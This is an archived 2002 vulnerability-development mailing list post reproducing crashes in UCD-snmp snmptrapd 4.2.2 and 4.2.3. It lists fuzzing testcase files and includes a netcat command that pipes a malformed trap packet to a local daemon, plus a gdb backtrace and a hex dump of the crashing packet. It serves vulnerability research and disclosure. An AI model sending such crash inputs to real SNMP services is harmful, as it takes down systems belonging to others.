Vulnerability Development mailing list archives
UCD-4.2.2 and UCD-4.2.3 snmptrapd verification
From: KF <dotslash () snosoft com>
Date: Sat, 16 Feb 2002 10:39:14 -0500
so far on UCD-4.2.2 I have the following... I am now looking at 4.2.3 something is definately wrong in the logging functions of both when compiled from the .tar.gz... the default mandrake binary did not have this issue, I recompiled it on my own. I have my config.cache and snmptrapd.conf if anyone wants them.
-KF [root@linuxppc root]# ls testcases-KEEP-4.2.2/ 00000828 00002424.core 00002438.log 00002476 00002491.core 00000828.core 00002424.log 00002451 00002476.core 00002491.log 00000828.log 00002425 00002451.core 00002476.log 00002500 00000874 00002425.core 00002451.log 00002477 00002500.core 00000874.core 00002425.log 00002452 00002477.core 00002500.log 00000874.log 00002426 00002452.core 00002477.log 00002502 00002114 00002426.core 00002452.log 00002479 00002502.core 00002114.core 00002426.log 00002453 00002479.core 00002502.log 00002114.log 00002435 00002453.core 00002479.log 00002510 00002160 00002435.core 00002453.log 00002480 00002510.core 00002160.core 00002435.log 00002454 00002480.core 00002510.log 00002160.log 00002436 00002454.core 00002480.log 00002511 00002178 00002436.core 00002454.log 00002489 00002511.core 00002178.core 00002436.log 00002464 00002489.core 00002511.log 00002178.log 00002437 00002464.core 00002489.log 00002512 00002224 00002437.core 00002464.log 00002490 00002512.core 00002224.core 00002437.log 00002465 00002490.core 00002512.log 00002224.log 00002438 00002465.core 00002490.log 00002424 00002438.core 00002465.log 00002491 The attached .txt is the first attempt to aggrivate 4.2.3 -KF
I think its safe to say "Your results may vary with snmptrapd versions..." I downloaded UCD-4.2.2 and UCD-4.2.3 and untared the source ... typed ./configure make install ... everything you normally do when you get a source tar ball... My os description is as follows... [root@linuxppc testcases-KEEP]# uname -a Linux linuxppc 2.4.4-6.2mdk #1 Thu Jun 28 02:41:08 CEST 2001 ppc unknown [root@linuxppc testcases-KEEP]# cat /etc/redhat-release Linux Mandrake release 8.0 (Traktopel) for ppc [root@linuxppc testcases-KEEP]# cat /proc/cpuinfo | grep mother motherboard : PowerBook4,1 PowerBook2,2 MacRISC2 MacRISC Power Macintosh ^--- just to stress I am not on an x86 box [root@linuxppc ucd-snmp-4.2.3]# cp apps/snmptrapd rootme [root@linuxppc ucd-snmp-4.2.3]# ./rootme -p 6969 -o rootme.log [root@linuxppc ucd-snmp-4.2.3]# ps -ef | grep -v grep | grep rootme nada what caused this... [root@linuxppc testcases-KEEP]# cat 00000828 | nc -u localhost 6969 netcat is hung... [root@linuxppc ucd-snmp-4.2.3]# gdb ./rootme core Core was generated by `./rootme -p 6969 -o rootme.log'. Program terminated with signal 11, Segmentation fault. .. #0 0x0fe19090 in strlen () from /lib/libc.so.6 (gdb) bt #0 0x0fe19090 in strlen () from /lib/libc.so.6 #1 0x0fde8bfc in vfprintf () from /lib/libc.so.6 Cannot access memory at address 0x7fffc3d0 (gdb) l 721 722 #ifdef notused 723 in_addr_t myaddr; 724 oid src[MAX_OID_LEN], dst[MAX_OID_LEN], context[MAX_OID_LEN]; 725 int srclen, dstlen, contextlen; 726 char ctmp[300]; 727 #endif 728 729 /* register our configuration handlers now so -H properly displays them */ 730 register_config_handler("snmptrapd", "traphandle", [root@linuxppc ucd-snmp-4.2.3]# head -n 10 rootme.log 2002-02-16 10:19:35 UCD-snmp version 4.2.3 Started. Received 1307 bytes from 127.0.0.1:33175 0000: 30 82 05 17 02 01 00 04 06 70 75 62 6C 69 63 A4 0........public. 0016: 82 05 08 06 82 04 E4 D7 81 FF FF FF FF FF FF FF ................ 0032: FF 7F 81 FF FF FF FF FF FF FF FF 7F 81 FF FF FF ................ 0048: FF FF FF FF FF 7F 81 FF FF FF FF FF FF FF FF 7F ................ 0064: 81 FF FF FF FF FF FF FF FF 7F 81 FF FF FF FF FF ................ 0080: FF FF FF 7F 81 FF FF FF FF FF FF FF FF 7F 81 FF ................ 0096: FF FF FF FF FF FF FF 7F 81 FF FF FF FF FF FF FF ................ [root@linuxppc ucd-snmp-4.2.3]# tail -n 10 rootme.log 1168: FF FF FF FF FF 7F 81 FF FF FF FF FF FF FF FF 7F ................ 1184: 81 FF FF FF FF FF FF FF FF 7F 81 FF FF FF FF FF ................ 1200: FF FF FF 7F 81 FF FF FF FF FF FF FF FF 7F 81 FF ................ 1216: FF FF FF FF FF FF FF 7F 81 FF FF FF FF FF FF FF ................ 1232: FF 7F 81 FF FF FF FF FF FF FF FF 7F 81 FF FF FF ................ 1248: FF FF FF FF FF 7F 81 FF FF FF FF FF FF FF FF 7F ................ 1264: 81 FF FF FF FF FF FF FF FF 7F 00 40 04 7F 00 00 ...........@.... 1280: 01 02 01 00 02 01 00 43 02 03 3C 30 0E 30 0C 06 .......C..<0.0.. 1296: 08 2B 06 01 02 01 02 01 00 05 00 .+......... more packets sent but no more logs... cuz its dead now. -KF
Current thread:
- UCD-4.2.2 and UCD-4.2.3 snmptrapd verification KF (Feb 16)
- Re: UCD-4.2.2 and UCD-4.2.3 snmptrapd verification Wes Hardaker (Feb 18)
- Re: UCD-4.2.2 and UCD-4.2.3 snmptrapd verification Laurence Brockman (Feb 18)
- Re: UCD-4.2.2 and UCD-4.2.3 snmptrapd verification Wes Hardaker (Feb 18)
- Re: UCD-4.2.2 and UCD-4.2.3 snmptrapd verification KF (Feb 18)
- Re: UCD-4.2.2 and UCD-4.2.3 snmptrapd verification Wes Hardaker (Feb 18)
- Re: UCD-4.2.2 and UCD-4.2.3 snmptrapd verification Laurence Brockman (Feb 18)
- Re: UCD-4.2.2 and UCD-4.2.3 snmptrapd verification Laurence Brockman (Feb 18)
- Re: UCD-4.2.2 and UCD-4.2.3 snmptrapd verification Wes Hardaker (Feb 18)